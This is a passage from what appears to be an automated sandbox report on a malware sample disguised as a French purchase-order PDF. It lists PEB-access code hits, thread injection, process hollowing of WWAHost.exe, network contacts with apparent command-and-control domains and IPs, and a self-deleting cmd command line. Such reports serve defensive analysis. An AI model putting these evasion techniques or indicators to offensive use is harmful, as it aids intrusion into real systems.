Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03623D34 mov eax, dword ptr fs:[00000030h]	10_2_03623D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03623D34 mov eax, dword ptr fs:[00000030h]	10_2_03623D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036E8D34 mov eax, dword ptr fs:[00000030h]	10_2_036E8D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0364513A mov eax, dword ptr fs:[00000030h]	10_2_0364513A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0364513A mov eax, dword ptr fs:[00000030h]	10_2_0364513A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0369A537 mov eax, dword ptr fs:[00000030h]	10_2_0369A537
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03644D3B mov eax, dword ptr fs:[00000030h]	10_2_03644D3B
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03644D3B mov eax, dword ptr fs:[00000030h]	10_2_03644D3B
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03644D3B mov eax, dword ptr fs:[00000030h]	10_2_03644D3B
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03619100 mov eax, dword ptr fs:[00000030h]	10_2_03619100
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03619100 mov eax, dword ptr fs:[00000030h]	10_2_03619100
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03619100 mov eax, dword ptr fs:[00000030h]	10_2_03619100
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0361B1E1 mov eax, dword ptr fs:[00000030h]	10_2_0361B1E1
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0361B1E1 mov eax, dword ptr fs:[00000030h]	10_2_0361B1E1
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0361B1E1 mov eax, dword ptr fs:[00000030h]	10_2_0361B1E1
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036A41E8 mov eax, dword ptr fs:[00000030h]	10_2_036A41E8
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0362D5E0 mov eax, dword ptr fs:[00000030h]	10_2_0362D5E0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0362D5E0 mov eax, dword ptr fs:[00000030h]	10_2_0362D5E0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036DFDE2 mov eax, dword ptr fs:[00000030h]	10_2_036DFDE2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036DFDE2 mov eax, dword ptr fs:[00000030h]	10_2_036DFDE2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036DFDE2 mov eax, dword ptr fs:[00000030h]	10_2_036DFDE2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036DFDE2 mov eax, dword ptr fs:[00000030h]	10_2_036DFDE2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036C8DF1 mov eax, dword ptr fs:[00000030h]	10_2_036C8DF1
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03696DC9 mov eax, dword ptr fs:[00000030h]	10_2_03696DC9
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03696DC9 mov eax, dword ptr fs:[00000030h]	10_2_03696DC9
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03696DC9 mov eax, dword ptr fs:[00000030h]	10_2_03696DC9
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03696DC9 mov ecx, dword ptr fs:[00000030h]	10_2_03696DC9
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03696DC9 mov eax, dword ptr fs:[00000030h]	10_2_03696DC9
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03696DC9 mov eax, dword ptr fs:[00000030h]	10_2_03696DC9
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036E05AC mov eax, dword ptr fs:[00000030h]	10_2_036E05AC
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036E05AC mov eax, dword ptr fs:[00000030h]	10_2_036E05AC
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036461A0 mov eax, dword ptr fs:[00000030h]	10_2_036461A0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036461A0 mov eax, dword ptr fs:[00000030h]	10_2_036461A0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036435A1 mov eax, dword ptr fs:[00000030h]	10_2_036435A1
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036969A6 mov eax, dword ptr fs:[00000030h]	10_2_036969A6
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03641DB5 mov eax, dword ptr fs:[00000030h]	10_2_03641DB5
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03641DB5 mov eax, dword ptr fs:[00000030h]	10_2_03641DB5
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03641DB5 mov eax, dword ptr fs:[00000030h]	10_2_03641DB5
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036951BE mov eax, dword ptr fs:[00000030h]	10_2_036951BE
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036951BE mov eax, dword ptr fs:[00000030h]	10_2_036951BE
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036951BE mov eax, dword ptr fs:[00000030h]	10_2_036951BE
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036951BE mov eax, dword ptr fs:[00000030h]	10_2_036951BE
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0364A185 mov eax, dword ptr fs:[00000030h]	10_2_0364A185
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0363C182 mov eax, dword ptr fs:[00000030h]	10_2_0363C182
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03642581 mov eax, dword ptr fs:[00000030h]	10_2_03642581
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03642581 mov eax, dword ptr fs:[00000030h]	10_2_03642581
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03642581 mov eax, dword ptr fs:[00000030h]	10_2_03642581
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03642581 mov eax, dword ptr fs:[00000030h]	10_2_03642581
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03612D8A mov eax, dword ptr fs:[00000030h]	10_2_03612D8A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03612D8A mov eax, dword ptr fs:[00000030h]	10_2_03612D8A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03612D8A mov eax, dword ptr fs:[00000030h]	10_2_03612D8A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03612D8A mov eax, dword ptr fs:[00000030h]	10_2_03612D8A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03612D8A mov eax, dword ptr fs:[00000030h]	10_2_03612D8A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03642990 mov eax, dword ptr fs:[00000030h]	10_2_03642990
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0364FD9B mov eax, dword ptr fs:[00000030h]	10_2_0364FD9B
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0364FD9B mov eax, dword ptr fs:[00000030h]	10_2_0364FD9B
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0363746D mov eax, dword ptr fs:[00000030h]	10_2_0363746D
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036E1074 mov eax, dword ptr fs:[00000030h]	10_2_036E1074
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036D2073 mov eax, dword ptr fs:[00000030h]	10_2_036D2073
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0364A44B mov eax, dword ptr fs:[00000030h]	10_2_0364A44B
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03630050 mov eax, dword ptr fs:[00000030h]	10_2_03630050
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03630050 mov eax, dword ptr fs:[00000030h]	10_2_03630050
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036AC450 mov eax, dword ptr fs:[00000030h]	10_2_036AC450
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036AC450 mov eax, dword ptr fs:[00000030h]	10_2_036AC450
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0362B02A mov eax, dword ptr fs:[00000030h]	10_2_0362B02A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0362B02A mov eax, dword ptr fs:[00000030h]	10_2_0362B02A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0362B02A mov eax, dword ptr fs:[00000030h]	10_2_0362B02A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0362B02A mov eax, dword ptr fs:[00000030h]	10_2_0362B02A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0364BC2C mov eax, dword ptr fs:[00000030h]	10_2_0364BC2C
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0364002D mov eax, dword ptr fs:[00000030h]	10_2_0364002D
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0364002D mov eax, dword ptr fs:[00000030h]	10_2_0364002D
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0364002D mov eax, dword ptr fs:[00000030h]	10_2_0364002D
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0364002D mov eax, dword ptr fs:[00000030h]	10_2_0364002D
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0364002D mov eax, dword ptr fs:[00000030h]	10_2_0364002D
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036E740D mov eax, dword ptr fs:[00000030h]	10_2_036E740D
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036E740D mov eax, dword ptr fs:[00000030h]	10_2_036E740D
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036E740D mov eax, dword ptr fs:[00000030h]	10_2_036E740D
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03696C0A mov eax, dword ptr fs:[00000030h]	10_2_03696C0A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03696C0A mov eax, dword ptr fs:[00000030h]	10_2_03696C0A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03696C0A mov eax, dword ptr fs:[00000030h]	10_2_03696C0A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03696C0A mov eax, dword ptr fs:[00000030h]	10_2_03696C0A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036D1C06 mov eax, dword ptr fs:[00000030h]	10_2_036D1C06
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036D1C06 mov eax, dword ptr fs:[00000030h]	10_2_036D1C06
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036D1C06 mov eax, dword ptr fs:[00000030h]	10_2_036D1C06
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036D1C06 mov eax, dword ptr fs:[00000030h]	10_2_036D1C06
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036D1C06 mov eax, dword ptr fs:[00000030h]	10_2_036D1C06
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036D1C06 mov eax, dword ptr fs:[00000030h]	10_2_036D1C06
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036D1C06 mov eax, dword ptr fs:[00000030h]	10_2_036D1C06
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036D1C06 mov eax, dword ptr fs:[00000030h]	10_2_036D1C06
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036D1C06 mov eax, dword ptr fs:[00000030h]	10_2_036D1C06
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036D1C06 mov eax, dword ptr fs:[00000030h]	10_2_036D1C06
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036D1C06 mov eax, dword ptr fs:[00000030h]	10_2_036D1C06
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036D1C06 mov eax, dword ptr fs:[00000030h]	10_2_036D1C06
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036D1C06 mov eax, dword ptr fs:[00000030h]	10_2_036D1C06
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036D1C06 mov eax, dword ptr fs:[00000030h]	10_2_036D1C06
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036E4015 mov eax, dword ptr fs:[00000030h]	10_2_036E4015
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036E4015 mov eax, dword ptr fs:[00000030h]	10_2_036E4015
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03697016 mov eax, dword ptr fs:[00000030h]	10_2_03697016
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03697016 mov eax, dword ptr fs:[00000030h]	10_2_03697016
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03697016 mov eax, dword ptr fs:[00000030h]	10_2_03697016
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036158EC mov eax, dword ptr fs:[00000030h]	10_2_036158EC
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036D14FB mov eax, dword ptr fs:[00000030h]	10_2_036D14FB
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03696CF0 mov eax, dword ptr fs:[00000030h]	10_2_03696CF0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03696CF0 mov eax, dword ptr fs:[00000030h]	10_2_03696CF0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03696CF0 mov eax, dword ptr fs:[00000030h]	10_2_03696CF0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036E8CD6 mov eax, dword ptr fs:[00000030h]	10_2_036E8CD6
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036AB8D0 mov eax, dword ptr fs:[00000030h]	10_2_036AB8D0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036AB8D0 mov ecx, dword ptr fs:[00000030h]	10_2_036AB8D0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036AB8D0 mov eax, dword ptr fs:[00000030h]	10_2_036AB8D0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036AB8D0 mov eax, dword ptr fs:[00000030h]	10_2_036AB8D0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036AB8D0 mov eax, dword ptr fs:[00000030h]	10_2_036AB8D0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036AB8D0 mov eax, dword ptr fs:[00000030h]	10_2_036AB8D0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036420A0 mov eax, dword ptr fs:[00000030h]	10_2_036420A0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036420A0 mov eax, dword ptr fs:[00000030h]	10_2_036420A0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036420A0 mov eax, dword ptr fs:[00000030h]	10_2_036420A0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036420A0 mov eax, dword ptr fs:[00000030h]	10_2_036420A0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036420A0 mov eax, dword ptr fs:[00000030h]	10_2_036420A0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036420A0 mov eax, dword ptr fs:[00000030h]	10_2_036420A0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036590AF mov eax, dword ptr fs:[00000030h]	10_2_036590AF
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0364F0BF mov ecx, dword ptr fs:[00000030h]	10_2_0364F0BF
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0364F0BF mov eax, dword ptr fs:[00000030h]	10_2_0364F0BF
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0364F0BF mov eax, dword ptr fs:[00000030h]	10_2_0364F0BF
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03619080 mov eax, dword ptr fs:[00000030h]	10_2_03619080
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03693884 mov eax, dword ptr fs:[00000030h]	10_2_03693884
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03693884 mov eax, dword ptr fs:[00000030h]	10_2_03693884
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0362849B mov eax, dword ptr fs:[00000030h]	10_2_0362849B

Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.jual-penggugurkandungan.com
Source: C:\Windows\explorer.exe	Domain query: www.handybusy.com
Source: C:\Windows\explorer.exe	Network Connect: 162.241.218.97 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.n1getaccess.com
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.shopvybz.com
Source: C:\Windows\explorer.exe	Domain query: www.comericac.com
Source: C:\Windows\explorer.exe	Domain query: www.discountpty.com
Source: C:\Windows\explorer.exe	Domain query: www.mybluemonitor.com
Source: C:\Windows\explorer.exe	Domain query: www.trucktodock.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 160.153.138.219 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.theassistedadrscheme.com
Source: C:\Windows\explorer.exe	Domain query: www.indiadesignstory.com

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Section loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Section loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Thread register set: target process: 3388			Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Thread register set: target process: 3388			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe

Section unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: 2F0000

Jump to behavior

Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Process created: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe			Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe'			Jump to behavior

Source: explorer.exe, 00000003.00000000.268407308.0000000001398000.00000004.00000020.sdmp	Binary or memory string: ProgmanamF
Source: explorer.exe, 00000003.00000000.248116265.0000000001980000.00000002.00000001.sdmp, WWAHost.exe, 0000000A.00000002.478096926.0000000005EA0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000003.00000000.257195689.0000000006860000.00000004.00000001.sdmp, WWAHost.exe, 0000000A.00000002.478096926.0000000005EA0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.248116265.0000000001980000.00000002.00000001.sdmp, WWAHost.exe, 0000000A.00000002.478096926.0000000005EA0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.248116265.0000000001980000.00000002.00000001.sdmp, WWAHost.exe, 0000000A.00000002.478096926.0000000005EA0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
